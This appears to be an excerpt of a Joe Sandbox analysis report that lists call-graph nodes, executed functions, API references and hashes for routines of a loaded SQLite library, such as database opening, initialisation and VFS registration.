28929->28930 28987 61e13f07 28929->28987 28999 61e0a964 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28930->28999 28931 61e14051 28931->28930 28933 61e140a2 28931->28933 28998 61e0a964 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28933->28998 29000 61e271b5 28935->29000 28939 61e01721 sqlite3_mutex_enter 28938->28939 28939->28853 28940->28870 28941->28851 28942->28829 28943->28822 28944->28844 28945->28835 28947 61e3924b 28946->28947 28948 61e39259 28946->28948 28986 61e38f24 30 API calls 28947->28986 28981 61e01645 28948->28981 28982 61e177da 28948->28982 28951 61e39271 28952 61e39278 sqlite3_free 28951->28952 28953 61e3928d 28951->28953 28952->28981 28954 61e392b0 sqlite3_win32_is_nt 28953->28954 28955 61e39297 28953->28955 28954->28955 28956 61e392b9 28954->28956 28955->28956 28957 61e1768b sqlite3_win32_sleep 28955->28957 28958 61e3932a 28955->28958 28956->28958 28959 61e3930a sqlite3_free sqlite3_free 28956->28959 28957->28955 28960 61e39398 CreateFileW 28958->28960 28961 61e3938f sqlite3_win32_is_nt 28958->28961 28959->28981 28963 61e393e7 28960->28963 28964 61e393d8 28960->28964 28961->28960 28962 61e393ec 28961->28962 28962->28963 28971 61e1768b sqlite3_win32_sleep 28962->28971 28965 61e26cd5 sqlite3_log 28963->28965 28964->28960 28964->28963 28966 61e1768b sqlite3_win32_sleep 28964->28966 28967 61e3944b 28965->28967 28966->28964 28968 61e39457 28967->28968 28969 61e394d9 sqlite3_free sqlite3_free 28967->28969 28970 61e2638f 14 API calls 28968->28970 28973 61e39518 sqlite3_uri_boolean 28969->28973 28974 61e3947a sqlite3_free sqlite3_free 28970->28974 28971->28962 28973->28981 28976 61e39496 28974->28976 28977 61e394c8 28974->28977 28976->28977 28978 61e3949c 28976->28978 28979 61e28a17 sqlite3_log 28977->28979 28980 61e3920b 34 API calls 28978->28980 28979->28981 28980->28981 28981->28850 28983 61e177f5 sqlite3_win32_is_nt 28982->28983 28984 61e177eb 28982->28984 28983->28984 28985 61e177fe 28983->28985 28984->28983 28986->28948 28988 61e13f1a 28987->28988 28989 61e13f2d sqlite3_mutex_enter 28987->28989 28990 61e0fff3 6 API calls 28988->28990 28991 61e13f84 sqlite3_mutex_leave 28989->28991 28992 61e13f44 28989->28992 28994 61e13f22 28990->28994 28991->28988 28993 61e13f28 28991->28993 28992->28991 28993->28931 28994->28993 28995 61e13f9f sqlite3_mutex_enter 28994->28995 28996 61e13fb6 28995->28996 28997 61e13fc8 sqlite3_mutex_leave 28996->28997 28997->28993 28998->28927 28999->28927 29005 61e271df 29000->29005 29001 61e27249 ReadFile 29002 61e27272 29001->29002 29001->29005 29009 61e26cd5 sqlite3_log 29002->29009 29004 61e0150a 29004->28858 29005->29001 29005->29002 29005->29004 29007 61e272a5 29005->29007 29010 61e1768b sqlite3_win32_sleep 29005->29010 29011 61e2638f 14 API calls 29007->29011 29009->29004 29010->29005 29011->29004 29012->28879 29013 61e7607b sqlite3_mutex_enter 29021 61e760bc 29013->29021 29014 61e76277 29092 61e2926c 11 API calls 29014->29092 29015 61e7626d 29086 61e0f5d9 sqlite3_free 29015->29086 29017 61e0f637 sqlite3_free 29017->29021 29018 61e764ab 29093 61e0f5d9 sqlite3_free 29018->29093 29021->29017 29029 61e76142 29021->29029 29034 61e76173 29021->29034 29035 61e761dc 29021->29035 29040 61e761a3 29021->29040 29046 61e131a9 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 29021->29046 29047 61e5ede5 29021->29047 29084 61e106be 6 API calls 29021->29084 29087 61e20b18 8 API calls 29021->29087 29088 61e21884 8 API calls 29021->29088 29089 61e169f4 16 API calls 29021->29089 29090 61e15343 7 API calls 29021->29090 29091 61e75efd 16 API calls 29021->29091 29024 61e764b5 29094 61e119f8 sqlite3_free sqlite3_free 29024->29094 29027 61e764bd 29095 61e0f5d9 sqlite3_free 29027->29095 29080 61e29a7c 9 API calls 29029->29080 29030 61e764c7 29032 61e764d1 sqlite3_mutex_leave 29030->29032 29034->29040 29081 61e0f5d9 sqlite3_free 29034->29081 29082 61e0f5d9 sqlite3_free 29035->29082 29038 61e761e6 29083 61e2dfee 9 API calls 29038->29083 29040->29014 29040->29015 29085 61e526eb 121 API calls 29040->29085 29046->29021 29096 61e5e966 29047->29096 29050 61e5eed4 29050->29021 29052 61e5ee14 29052->29050 29101 61e03e4e sqlite3_stricmp sqlite3_stricmp 29052->29101 29054 61e5f00f 29112 61e29a7c 9 API calls 29054->29112 29055 61e5efe8 29111 61e29a7c 9 API calls 29055->29111 29056 61e5ee3f 29058 61e5ee5b sqlite3_strnicmp 29056->29058 29063 61e5eeb8 29056->29063 29079 61e5ef28 29056->29079 29060 61e5ee7e 29058->29060 29058->29079 29102 61e045ba sqlite3_stricmp 29060->29102 29062 61e5ee89 29062->29079 29103 61e1235e 11 API calls 29062->29103 29063->29050 29065 61e5ef2d 29063->29065 29066 61e5ef1f 29063->29066 29063->29079 29105 61e2192e 8 API calls 29065->29105 29104 61e0f5d9 sqlite3_free 29066->29104 29069 61e5ef5a 29106 61e2192e 8 API calls 29069->29106 29071 61e5ef65 29107 61e2192e 8 API calls 29071->29107 29073 61e5ef79 29108 61e2e092 11 API calls 29073->29108 29075 61e5ef94 29075->29050 29109 61e29a7c 9 API calls 29075->29109 29077 61e5efb6 29110 61e0f5d9 sqlite3_free 29077->29110 29079->29050 29079->29054 29079->29055 29080->29034 29081->29040 29082->29038 29083->29040 29084->29021 29085->29015 29086->29014 29087->29021 29088->29021 29089->29021 29090->29021 29091->29021 29092->29018 29093->29024 29094->29027 29095->29030 29097 61e5e980 29096->29097 29098 61e5e978 29096->29098 29097->29050 29100 61e03d57 sqlite3_stricmp 29097->29100 29113 61e5e8a4 29098->29113 29100->29052 29101->29056 29102->29062 29103->29063 29104->29079 29105->29069 29106->29071 29107->29073 29108->29075 29109->29077 29110->29079 29111->29050 29112->29050 29116 61e5e8d6 29113->29116 29114 61e5e918 29115 61e5e916 29114->29115 29117 61e5e5f3 113 API calls 29114->29117 29115->29097 29116->29114 29116->29115 29122 61e5e5f3 29116->29122 29149 61e1210d sqlite3_free sqlite3_free sqlite3_free sqlite3_free 29116->29149 29118 61e5e932 29117->29118 29118->29115 29150 61e1210d sqlite3_free sqlite3_free sqlite3_free sqlite3_free 29118->29150 29151 61e6bbb1 29122->29151 29125 61e5e686 29125->29116 29126 61e1318f 3 API calls 29127 61e5e6a2 29126->29127 29128 61e5e6dc 29127->29128 29169 61e3d349 29127->29169 29137 61e5e6fb 29128->29137 29189 61e134f9 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 29128->29189 29131 61e5e6b9 29131->29128 29132 61e5e6c6 29131->29132 29188 61e11306 sqlite3_free 29132->29188 29134 61e5e78a 29191 61e11306 sqlite3_free 29134->29191 29135 61e5e76b 29135->29134 29138 61e5e7a3 29135->29138 29137->29134 29137->29135 29190 61e13718 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 29137->29190 29192 61e2dfee 9 API calls 29138->29192 29142 61e5e7d6 sqlite3_exec 29193 61e0f5d9 sqlite3_free 29142->29193 29144 61e5e82c 29145 61e5e83a 29144->29145 29194 61e5e519 11 API calls 29144->29194 29147 61e5e79e 29145->29147 29195 61e13258 7 API calls 29145->29195 29147->29125 29196 61e42cce 94 API calls 29147->29196 29149->29116 29150->29115 29152 61e6bbf1 29151->29152 29153 61e6bbdb 29151->29153 29155 61e5e665 29152->29155 29156 61e6bbff 29152->29156 29157 61e6bc08 sqlite3_strnicmp 29152->29157 29197 61e2e004 10 API calls 29153->29197 29155->29125 29155->29126 29199 61e2e004 10 API calls 29156->29199 29158 61e6bc3c 29157->29158 29159 61e6bcdd 29157->29159 29161 61e6bc53 sqlite3_prepare 29158->29161 29159->29156 29166 61e6bcff 29159->29166 29162 61e6bc96 29161->29162 29163 61e6bcd0 sqlite3_finalize 29161->29163 29162->29163 29164 61e6bcaa 29162->29164 29165 61e6bcbc sqlite3_errmsg 29162->29165 29163->29155 29164->29163 29198 61e2e004 10 API calls 29165->29198 29166->29155 29200 61e2e004 10 API calls 29166->29200 29170 61e1318f 3 API calls 29169->29170 29178 61e3d360 29170->29178 29171 61e3d8c1 29171->29131 29172 61e3d7f5 29172->29171 29231 61e126fe 9 API calls 29172->29231 29176 61e3d7fa 29176->29171 29176->29172 29230 61e39f2b 71 API calls 29176->29230 29178->29172 29178->29176 29179 61e3d464 memcmp 29178->29179 29180 61e3d4a2 memcmp 29178->29180 29182 61e3d723 memcmp 29178->29182 29183 61e3d51b memcmp 29178->29183 29187 61e13fdf 15 API calls 29178->29187 29201 61e3a91a 29178->29201 29223 61e02ffb 29178->29223 29226 61e8b1c5 47 API calls 29178->29226 29227 61e0af47 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 29178->29227 29228 61e2742d sqlite3_log 29178->29228 29229 61e3d291 71 API calls 29178->29229 29179->29178 29180->29178 29182->29178 29183->29178 29187->29178 29188->29125 29190->29135 29191->29147 29192->29142 29193->29144 29194->29145 29196->29125 29197->29155 29198->29163 29199->29155 29200->29155 29202 61e3a932 29201->29202 29203 61e3ac7f 29201->29203 29206 61e3abb0 29202->29206 29212 61e3a958 29202->29212 29218 61e0161c 45 API calls 29202->29218 29220 61e3a9ef 29202->29220 29222 61e3aa3d 29202->29222 29203->29206 29235 61e335e4 28 API calls 29203->29235 29204 61e3ad31 29204->29178 29206->29204 29236 61e12d72 sqlite3_free sqlite3_free 29206->29236 29208 61e014e3 17 API calls 29209 61e3abe9 29208->29209 29209->29206 29210 61e3ac04 memcmp 29209->29210 29215 61e3ac22 29210->29215 29211 61e3ab63 29211->29206 29211->29222 29233 61e3a458 71 API calls 29211->29233 29212->29206 29212->29211 29214 61e0161c 45 API calls 29212->29214 29212->29222 29216 61e3ab4d 29214->29216 29215->29203 29234 61e8b1c5 47 API calls 29215->29234 29216->29211 29232 61e28a17 sqlite3_log 29216->29232 29217 61e014e3 17 API calls 29217->29212 29218->29220 29220->29212 29220->29217 29220->29222 29222->29206 29222->29208 29222->29215 29237 61e029e5 29223->29237 29225 61e0301b 29225->29178 29226->29178 29227->29178 29228->29178 29229->29178 29230->29172 29231->29171 29232->29211 29233->29222 29234->29203 29235->29203 29236->29204 29240 61e3c538 29237->29240 29238 61e02a04 29238->29225 29241 61e3c54b 29240->29241 29249 61e3c55a 29240->29249 29265 61e2742d sqlite3_log 29241->29265 29243 61e3c653 29266 61e2742d sqlite3_log 29243->29266 29244 61e3c664 29248 61e3c67a 29244->29248 29250 61e3c6bd 29244->29250 29247 61e3c65d 29258 61e3c555 29247->29258 29270 61e3b345 71 API calls 29247->29270 29248->29247 29253 61e3c686 29248->29253 29249->29243 29249->29244 29249->29247 29249->29258 29251 61e3c6ce 29250->29251 29269 61e32ec5 8 API calls 29250->29269 29251->29247 29259 61e07e08 29251->29259 29255 61e3c69e 29253->29255 29253->29258 29267 61e12a33 7 API calls 29253->29267 29268 61e12b76 7 API calls 29255->29268 29258->29238 29260 61e07e30 29259->29260 29261 61e07e82 29259->29261 29262 61e014e3 17 API calls 29260->29262 29263 61e014e3 17 API calls 29261->29263 29264 61e07e7e 29262->29264 29263->29264 29264->29247 29265->29258 29266->29247 29267->29255 29268->29258 29269->29251 29271 61e17d9d 29272 61e1815a 29271->29272 29273 61e17dac 29271->29273 29273->29272 29274 61e17dce sqlite3_mutex_enter 29273->29274 29275 61e17df0 29274->29275 29283 61e17e0d 29274->29283 29276 61e17df9 sqlite3_config 29275->29276 29275->29283 29276->29283 29277 61e17f44 sqlite3_mutex_leave sqlite3_mutex_enter 29278 61e180fb sqlite3_mutex_leave sqlite3_mutex_enter 29277->29278 29284 61e17f6f 29277->29284 29279 61e18122 sqlite3_mutex_free 29278->29279 29280 61e18139 sqlite3_mutex_leave 29278->29280 29279->29280 29280->29272 29281 61e17efc sqlite3_mutex_leave 29281->29272 29283->29277 29283->29281 29284->29278 29285 61e17fcc sqlite3_malloc 29284->29285 29287 61e17ff9 sqlite3_config 29284->29287 29288 61e1800d 29284->29288 29286 61e18027 sqlite3_free sqlite3_os_init 29285->29286 29289 61e17feb 29285->29289 29286->29289 29287->29288 29288->29285 29288->29289 29289->29278 29290 61e1825f GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register

                                                    Executed Functions

                                                    Function 61E889F2 Relevance: 93.5, APIs: 38, Strings: 15, Instructions: 752COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 61e889f2-61e88a1f sqlite3_initialize 1 61e88a25-61e88a31 0->1 2 61e896b6-61e896bd 0->2 3 61e88a49-61e88a4e 1->3 4 61e88a33-61e88a36 1->4 5 61e88a50-61e88a55 3->5 6 61e88a57-61e88a5e 3->6 4->3 7 61e88a38-61e88a42 4->7 8 61e88a65 5->8 9 61e88a68-61e88a7f call 61e123e5 6->9 10 61e88a60 6->10 7->3 8->9 13 61e89660 9->13 14 61e88a85-61e88a87 9->14 10->8 17 61e89662-61e8966f sqlite3_errcode 13->17 15 61e88a89-61e88a98 call 61e01718 14->15 16 61e88aa7-61e88c38 sqlite3_mutex_enter call 61e29798 * 5 14->16 15->16 26 61e88a9a-61e88aa2 sqlite3_free 15->26 35 61e88c3e-61e88c6a call 61e12144 16->35 36 61e8969f-61e896aa sqlite3_mutex_leave 16->36 20 61e8967d-61e8967f 17->20 21 61e89671-61e8967b sqlite3_close 17->21 22 61e89688-61e8969d sqlite3_free 20->22 23 61e89681 20->23 21->22 22->2 23->22 26->13 39 61e88c78-61e88c92 call 61e357c2 35->39 40 61e88c6c-61e88c76 call 61e260ed 35->40 36->17 44 61e88c97-61e88c9b 39->44 40->44 45 61e88c9d-61e88ca0 44->45 46 61e88cdf-61e88d08 call 61e43e5d 44->46 47 61e88ca9-61e88cda call 61e2926c sqlite3_free 45->47 48 61e88ca2-61e88ca4 call 61e0a442 45->48 54 61e88d0a-61e88d20 call 61e16da5 46->54 55 61e88d25-61e88d47 call 61e1318f call 61e1525d 46->55 47->36 48->47 54->36 62 61e88d49-61e88d4f 55->62 63 61e88d52-61e88d8f call 61e0ae7f call 61e1525d 55->63 62->63 63->36 68 61e88d95-61e88db9 call 61e16da5 sqlite3_overload_function 63->68 71 61e88dbb-61e88dbd call 61e0a442 68->71 72 61e88dc2-61e88dd0 sqlite3_errcode 68->72 71->72 74 61e890e5-61e890e7 72->74 75 61e88dd6-61e88dd8 72->75 76 61e891aa-61e891ae 74->76 77 61e890ed-61e890f4 74->77 78 61e893de-61e893e2 75->78 79 61e88dde-61e88df2 sqlite3_malloc 75->79 76->78 80 61e891b4-61e891b6 76->80 83 61e8910d-61e89112 77->83 84 61e890f6-61e89102 sqlite3_errcode 77->84 81 61e894c8-61e894cc 78->81 82 61e893e8-61e893ea 78->82 85 61e88df8-61e88e47 call 61e26269 79->85 86 61e896ac-61e896b1 79->86 80->78 89 61e891bc-61e891e0 sqlite3_create_module 80->89 90 61e895b8-61e895ba 81->90 91 61e894d2-61e894d4 81->91 82->81 93 61e893f0-61e89434 sqlite3_create_function 82->93 92 61e89114-61e89132 call 61e01718 sqlite3_mutex_enter 83->92 84->36 87 61e89108 84->87 85->76 102 61e88e4d-61e88e91 sqlite3_create_function 85->102 86->78 87->76 89->78 95 61e891e6-61e891fb sqlite3_malloc 89->95 97 61e895bc-61e895be call 61e16da5 90->97 100 61e895c3-61e895ca 90->100 96 61e894da-61e894df 91->96 91->97 114 61e8913f-61e89141 92->114 115 61e89134-61e8913d 92->115 93->81 99 61e8943a-61e8947e sqlite3_create_function 93->99 95->81 105 61e89201-61e8923c call 61e1a4a1 95->105 106 61e894e1-61e894e4 96->106 97->100 99->81 108 61e89480-61e894a4 call 61e26269 99->108 103 61e895cc-61e895de call 61e113ca 100->103 104 61e895e3-61e895f3 sqlite3_wal_autocheckpoint 100->104 102->76 109 61e88e97-61e88ed7 sqlite3_create_function 102->109 103->104 104->36 124 61e89641 105->124 125 61e89242-61e8925c call 61e1a4a1 105->125 112 61e8952e-61e89533 106->112 113 61e894e6-61e894e8 106->113 108->81 130 61e894a6-61e894c6 call 61e26269 108->130 109->76 117 61e88edd-61e88f21 sqlite3_create_function 109->117 121 61e89535-61e89538 112->121 113->112 119 61e894ea-61e8952c sqlite3_create_function 113->119 120 61e89143-61e8915a sqlite3_mutex_leave 114->120 115->120 117->76 123 61e88f27-61e88f36 117->123 119->106 126 61e8915c-61e89172 120->126 127 61e89191-61e8919f sqlite3_free 120->127 128 61e8953a-61e8953c 121->128 129 61e89582 121->129 131 61e88f38-61e88f3a 123->131 134 61e89646-61e8965b call 61e09d7b sqlite3_free 124->134 125->124 146 61e89262-61e8927c call 61e1a4a1 125->146 126->127 148 61e89174-61e8918c call 61e2926c 126->148 127->92 136 61e891a5 127->136 128->129 133 61e8953e-61e89580 sqlite3_create_function 128->133 135 61e89584-61e89587 129->135 130->81 138 61e88f3c-61e88f3f 131->138 139 61e88f85-61e88f87 131->139 133->121 134->78 135->90 143 61e89589-61e8958b 135->143 136->84 138->139 145 61e88f41-61e88f83 sqlite3_create_function 138->145 139->76 147 61e88f8d-61e88f9f 139->147 143->90 150 61e8958d-61e895b6 sqlite3_create_module 143->150 145->131 146->124 158 61e89282-61e892c2 sqlite3_create_function 146->158 152 61e88fa1-61e88fa3 147->152 148->127 150->135 155 61e88fa5-61e88fa8 152->155 156 61e88fd7-61e88fd9 152->156 155->156 159 61e88faa-61e88fd5 155->159 156->76 157 61e88fdf-61e88ff1 156->157 160 61e88ff3-61e88ff5 157->160 158->134 161 61e892c8-61e89308 sqlite3_create_function 158->161 159->152 162 61e8902a-61e8902c 160->162 163 61e88ff7-61e88ffa 160->163 161->134 164 61e8930e-61e8932a sqlite3_overload_function 161->164 162->76 167 61e89032-61e89055 call 61e26269 162->167 163->162 166 61e88ffc-61e89028 163->166 164->134 168 61e89330-61e8934c sqlite3_overload_function 164->168 166->160 167->76 175 61e8905b-61e8909e sqlite3_create_function 167->175 168->134 169 61e89352-61e8936e sqlite3_overload_function 168->169 169->134 171 61e89374-61e89390 sqlite3_overload_function 169->171 171->134 174 61e89396-61e893b2 sqlite3_overload_function 171->174 174->134 176 61e893b8-61e893d8 call 61e26269 174->176 175->78 177 61e890a4-61e890e3 sqlite3_create_function 175->177 176->78 180 61e895f8-61e89618 call 61e26269 176->180 177->74 180->78 183 61e8961e-61e8963c sqlite3_create_module 180->183 183->78
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E88A18
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_free.SQLITE3 ref: 61E88A9D
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E88AB2
                                                      • Part of subcall function 61E357C2: memcmp.MSVCRT ref: 61E35810
                                                      • Part of subcall function 61E357C2: sqlite3_malloc64.SQLITE3 ref: 61E35844
                                                    • sqlite3_create_function.SQLITE3 ref: 61E8942B
                                                    • sqlite3_create_function.SQLITE3 ref: 61E89475
                                                    • sqlite3_create_function.SQLITE3 ref: 61E89525
                                                    • sqlite3_create_function.SQLITE3 ref: 61E89579
                                                    • sqlite3_free.SQLITE3 ref: 61E88CD5
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_errcode.SQLITE3 ref: 61E89665
                                                    • sqlite3_close.SQLITE3 ref: 61E89676
                                                    • sqlite3_free.SQLITE3 ref: 61E89693
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E896A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                    • String ID: BINARY$NOCASE$RTRIM$`da$fts3$fts4$fts5$fts5vocab$p_a$porter$rtree$rtree_i32$simple$unicode61$`a
                                                    • API String ID: 1097977795-2718777411
                                                    • Opcode ID: b619e4f99343ed7622057b3609f50fe014b2a63ff5a514a2c494b181803bd39c
                                                    • Instruction ID: 353953454cf66a83b840efa96aed405e13341269f318b144d262a95d4aa27974
                                                    • Opcode Fuzzy Hash: b619e4f99343ed7622057b3609f50fe014b2a63ff5a514a2c494b181803bd39c
                                                    • Instruction Fuzzy Hash: A87206B0A083428FE740DF69C59574ABBF1BFC5358F25C82DE8988B385D779D8458B82
                                                    Function 61E1825F Relevance: 7.5, APIs: 5, Instructions: 28COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 754 61e1825f-61e182d6 GetSystemInfo sqlite3_vfs_register * 4
                                                    APIs
                                                    • GetSystemInfo.KERNEL32(?,?,61E9E580,?,61E18034,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18279
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E1828F
                                                      • Part of subcall function 61E181FC: sqlite3_initialize.SQLITE3(?,?,61E18294), ref: 61E18207
                                                      • Part of subcall function 61E181FC: sqlite3_mutex_enter.SQLITE3(?,?,61E18294), ref: 61E1821F
                                                      • Part of subcall function 61E181FC: sqlite3_mutex_leave.SQLITE3(?), ref: 61E18251
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E182A3
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E182B7
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E182CB
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 3532963230-0
                                                    • Opcode ID: 75965ddb2269b8edbf3885b943fcc6cd509c2890a4864c204bf8cf1466f41b05
                                                    • Instruction ID: f4adc7e5cba52e1e67823a72f93f23c0d9953133953df27d674b99686b1a82ec
                                                    • Opcode Fuzzy Hash: 75965ddb2269b8edbf3885b943fcc6cd509c2890a4864c204bf8cf1466f41b05
                                                    • Instruction Fuzzy Hash: 64F034B1208644ABC380AF69C506B6ABAE4BBC2708F21C81DD1888B294C771C848AB57
                                                    Function 61E43E5D Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 762stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                    • String ID: -journal$@
                                                    • API String ID: 42632313-41206085
                                                    • Opcode ID: 432c37ed213bb684e3fdf39cf681bce07f847e087d1cce43a32b4ab238a17255
                                                    • Instruction ID: fe7e11a9fd44bee053b1b347378700ffa5302ac0beb5867e547a56e3f642e4b4
                                                    • Opcode Fuzzy Hash: 432c37ed213bb684e3fdf39cf681bce07f847e087d1cce43a32b4ab238a17255
                                                    • Instruction Fuzzy Hash: 09820574A04265CFEB10CF68D884B89BBF1BF49308F2981EAD8589B352D774D985CF51
                                                    Function 61E17D9D Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 227COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 393 61e17d9d-61e17da6 394 61e18161 393->394 395 61e17dac-61e17dbe call 61e08ce4 393->395 398 61e17dc4-61e17dea call 61e01718 sqlite3_mutex_enter 395->398 399 61e1815a-61e18160 395->399 402 61e17f11-61e17f22 398->402 403 61e17df0-61e17df7 398->403 399->394 406 61e17f44-61e17f69 sqlite3_mutex_leave sqlite3_mutex_enter 402->406 407 61e17f24-61e17f3a call 61e01718 402->407 404 61e17df9-61e17e08 sqlite3_config 403->404 405 61e17e0d-61e17e34 call 61e01718 403->405 404->405 419 61e17e36-61e17e3e 405->419 420 61e17e8e-61e17eac 405->420 408 61e180fb-61e18120 sqlite3_mutex_leave sqlite3_mutex_enter 406->408 409 61e17f6f-61e17f76 406->409 407->406 417 61e17f3c-61e17f3e 407->417 414 61e18122-61e1812f sqlite3_mutex_free 408->414 415 61e18139-61e18146 sqlite3_mutex_leave 408->415 409->408 412 61e17f7c-61e17fca call 61e0fb6d * 3 409->412 439 61e17ff0-61e17ff7 412->439 440 61e17fcc-61e17fe9 sqlite3_malloc 412->440 414->415 415->399 417->406 421 61e18148 417->421 419->420 424 61e17e40-61e17e48 419->424 422 61e17eb6-61e17ebd 420->422 425 61e1814d-61e18158 sqlite3_mutex_leave 421->425 426 61e17ed4-61e17ede 422->426 427 61e17ebf-61e17ec9 422->427 424->420 429 61e17e4a-61e17e68 424->429 425->399 433 61e17ee8-61e17efa 426->433 427->426 431 61e17ecb-61e17ed2 427->431 430 61e17e6a-61e17e6d 429->430 434 61e17e77-61e17e8c 430->434 435 61e17e6f-61e17e75 430->435 431->426 431->433 433->402 441 61e17efc-61e17f0c 433->441 434->422 435->430 444 61e17ff9-61e18008 sqlite3_config 439->444 445 61e1800d-61e1801f 439->445 442 61e18027-61e18038 sqlite3_free sqlite3_os_init 440->442 443 61e17feb 440->443 441->425 446 61e180f1 442->446 447 61e1803e-61e18045 442->447 443->446 444->445 445->446 451 61e18025 445->451 446->408 449 61e180e7 447->449 450 61e1804b-61e18082 447->450 449->446 452 61e18084-61e18089 450->452 453 61e1808c-61e180b3 450->453 451->440 452->453 454 61e180b7-61e180be 453->454 455 61e180c0-61e180cd 454->455 456 61e180cf-61e180d9 454->456 455->454 457 61e180e1 456->457 458 61e180db 456->458 457->449 458->457
                                                    APIs
